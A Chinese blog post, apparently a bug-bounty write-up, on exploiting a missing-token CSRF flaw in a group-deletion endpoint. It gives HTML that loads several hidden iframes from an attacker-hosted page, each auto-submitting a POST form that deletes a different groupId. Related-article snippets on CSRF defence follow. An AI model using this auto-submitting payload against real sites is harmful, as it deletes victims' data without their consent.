2.CSRF之批量自动遍历id

最新推荐文章于 2024-07-10 08:55:48 发布
最新推荐文章于 2024-07-10 08:55:48 发布
阅读量158 收藏
点赞数
分类专栏: SRC挖掘
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiru9972/article/details/112760140
版权

layout: post
title: 2. CSRF之批量自动遍历id
category: SRC
tags: SRC
keywords: SRC,CSRF

前言

该篇记录为记录实际的src过程第2篇小文章,内容为csrf发送多个post包。

抓包查看csrf特征

在删除用户群组的时候,抓包发现这样的包,没有做csrftoken的防护,也就是说可以进行csrf的攻击,但是每个用户的groupid的值未知,所以就有一个遍历的需求,否则危害很低。

csrf遍历发包

问了一波Art3mis师傅,他说iframe可以插入多个src链接,然后通过js自动化提交多个html。如:
a.html

<iframe type=hidden src="http://vps/b.html"></iframe>
<iframe type=hidden src="http://vps/c.html"></iframe>

b.html

<form method="POST" action="https://eval/del" id="test">
    <input name="groupId" value="10"></input>
</form>
<script>
var f=document.getElementById("test");
f.submit();
</script>

同理,c.html只要更改value值就可以构造了。

_HWHXY
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
详解利用django中间件django.middleware.csrf.CsrfViewMiddleware防止csrf攻击
09-20
Django框架提供了一个内置的中间件`django.middleware.csrf.CsrfViewMiddleware`来帮助开发者防范这种攻击。 **一、Django后台处理** 1. **启用CSRF保护中间件**: 在Django项目的`settings.py`文件中,你需要...
backbone.csrf:为所有Backbone同步请求配置X-CSRFToken标头
04-29
主干.csrf 将您的Backbone应用程序配置为与受CSRF保护的后端Web框架兼容 作者 兼容性 同时支持AMD / CommonJS规范。 依存关系 bone.csrf支持 1.7.1或更高版本 需要 安装 凉亭 bower install backbone.csrf NPM ...
【网络安全渗透测试零基础入门必知必会】之CSRF漏洞挖掘与自动化工具(非常详细)零基础入门到精通,收藏这一篇就够了4
最新发布
Libra1313的博客
07-10 545
这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段文件CSRF漏洞概述和原理第4篇。本文主要讲解CSRF漏洞挖掘与自动化工具,本文归纳整理了三款工具。1.CSRFTester` `2.burp中的插件一、CSRFTester今天给大家介绍一款CSRF漏洞利用工具:CSRFTester一、环境:win7二、用法1、设置浏览器代理服务器:127.0.0.1:80082、运行软件,点击start3、在页面输入要提交的数值,点击change4、查看CSRFTester。
跨站请求伪造——CSRF
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-18 2102
csrf,不需要知道别人的cookies,伪装成别人 xss,要先知道别人的cookies,伪装成别人
CSRF漏洞原理攻击与防御(非常细)
Karka_的博客
06-07 1559
CSRF (Cross-site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户请求受信任的网站。简单的说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己以前认证过的站点并运行一些操作(如发邮件,发消息,甚至财产操作(如转账和购买商品))。
攻防世界 ics-06 解题思路
xj28555的博客
07-08 1111
进入题目 发现报表中心可以点击 看到这题目我首先想到了是sql注入,但是试了半天都没有反应,所以我想了想其他的方法,但是都没有办法。所以我无奈的去百度了下wp,发现这题竟然是一个id变量遍历的题目,有点小无语,但是在渗透测试中遍历id有时候确实会有意想不到的收获,这也算我忽视的一个小知识点吧。遍历id=2333的 ...
计算机前端-实战.aravel框架2-06.csrf攻击.wmv
06-06
计算机前端-实战.aravel框架2-06.csrf攻击.wmv
教主Kali与Python黑客.6.WEB攻击.5.CSRF
10-14
教主Kali与Python黑客.6.WEB攻击.5.CSRF
爬虫入门(三)进阶技巧之ID遍历、追踪链接
qq_55796594的博客
07-13 1728
1.使用id遍历 (1)原理 使用id遍历网页是常见的法,由于大多数网站存储的数据太多,不可能为每一个网页都起名字,便用id标记使得数据库方便识别,这也使得按id遍历网页成为可能。 在示例网站:http://example.python-scraping.com 我们可以用两种方式访问同一网页:http://example.python-scraping.com/view/Afghanistan-1 http://example.python-scraping.com/view/1 所以..
CSRFScanner:Python CSRF漏洞扫描器
05-06
CSRFScanner v1.0 Python CSRF漏洞扫描器 描述 CSRFScanner是一种用于扫描网站以查找CSRF漏洞的工具。 这是一个基本工具,不是很人性化,我最初是出于学术目的而开发的。 可以在PDF CSRFScanner_Explications.pdf(以法语编写)中找到更多说明。 要求 Python> = 2.6 用法 python main.py [-R] URL Cookie -R是一个可选参数,用于跟随内部链接以扫描整个网站。 URL是要扫描的网页 Cookie是要发送以进行身份​​验证的Cookie。 可以使用Wireshark之​​类的工具,Burp或Webscarab之类的Web代理,TamperData之类的Web浏览器扩展来查看...
CSRF SSRF
qq_49310461的博客
10-19 377
CSRF SSRF 1.CSRF的基本概念、缩写、全称 CSRF(Cross-site request forgery):跨站请求伪造。 PS:中文名一定要记住。英文全称,如果记不住也拉倒。 2.CSRF的攻击原理 用户是网站A的注册用户,且登录进去,于是网站A就给用户下发cookie。 从上图可以看出,要完成一次CSRF攻击,受害者必须满足两个必要的条件: (1)登录受信任网站A,服务器并在本地生成Cookie。(如果用户没有登录网站A,那么网站B在诱导的时候,请求网站A的api接口时,会提示你登录
爬取DMP_ISV版(达摩盘服务商版)画像数据
小月牙
07-27 3616
本次来看一下达摩盘服务商版的画像数据抓取过程,先随便选取一个人群包进行画像透视,进入到画像页面后,开始抓包 抓包找数据是个细致活,基本就是先找xhr中,找不到再去js中,最后去ws中,这边刚好就在xhr里,可以看到每一个标签都进行了请求才获得数据,那么来分析其中一个包的参数吧 一眼就能看到是个ajax请求,param带着两个暂时不知道是什么的参数,r猜测是随机数,csrfId仔细看的话,之前的包每一个都带着它,那么只要继续往上找,就能找到是从哪里获取的了 再来看看data部分,如果你.
后台遍历数组id查询数据
liangweihao的博客
12-13 1147
Java后台遍历数组id查询数据
前端安全之 CSRF 攻击原理和防护方法
weixin_59124055的博客
06-13 6060
CSRF(Cross-site request forgery)简称:跨站请求伪造,学习 CSRF 攻击原理和防护方法是我们团队新成员的必修课,通常我都是先让新同学自己研究自己讲,然后我再通过其中细节再给他们讲一遍,讲的次数多了,也慢慢总结出一种比较容易理解的讲法。这里我整理成文分享给有需要的人。引言:必修课为什么选择 CSRFCSRF 涉及到的前端知识点比较多,全面理解需要系统的学习 Cookie,前端跨域,HTTP 协议,web 浏览器等知识。理解 CSRF 攻击和防护方法是前端进阶要去,我也希望大家
CSRF攻击与防御(写得非常好)
热门推荐
认知 行动 坚持
12-08 25万+
转载地址:http://www.phpddt.com/reprint/csrf.html CSRF概念:CSRF跨站点请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的危害性,你可以这样来理解: 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,
CSRF简单介绍与解决方法
qq_41024101的博客
01-24 1457
CSRF (Cross-site request forgery) 跨站请求伪造 知识点: 目前绝大多数网站采用的还是 session 会话任务的方式。session 机制简单的来说就是服务端使用一个键值对记录登录信息,同时在 cookie 中将 session id(即刚才说的键)存储到 cookie 中。 另外我们又知道浏览器中 HTTP(s) 请求是会自动帮我们把 cookie 带上传给服务端的。这样在每次请求的时候通过 cookie 获取 session...
csrf 原理与解决方案
水墨江南
10-09 6410
一.CSRF是什么?   CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 二.CSRF可以什么?   你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够的事情包括:以你名义发送邮件,发消息,盗取你的账号...
什么是CSRF?可能多数人都不清楚,没事,一起来了解!!!
lajos的博客
06-23 3万+
        CSRF即跨站请求攻击。简单的说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己以前认证过的站点并运行一些操作(如发邮件,发消息,甚至财产操作(如转账和购买商品))。因为浏览器之前认证过,所以被访问的站点会绝点是这是真正的用户操作而去运行。        这就利用了web中用户身份认证验证的一个漏洞:简单的身份验证仅仅能保证请求发自某个用户的浏览器,却不能保证请求本身是用户...
httpSecurity.csrf()
10-10
httpSecurity.csrf()是Spring Security框架中的一个方法,用于配置跨站请求伪造(Cross-Site Request Forgery,CSRF)保护。 CSRF攻击是一种常见的网络安全攻击,攻击者利用用户的身份进行非法操作。为了防止这种攻击,可以使用CSRF保护机制。Spring Security提供了一种简单的方式来配置CSRF保护。 在调用httpSecurity.csrf()方法后,Spring Security会自动在应用程序中添加CSRF保护。它会生成一个CSRF令牌,并将其包含在每个表单请求中。当用户提交表单时,服务器将验证所提交请求中的令牌是否与服务器生成的令牌匹配,以确保请求的合法性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值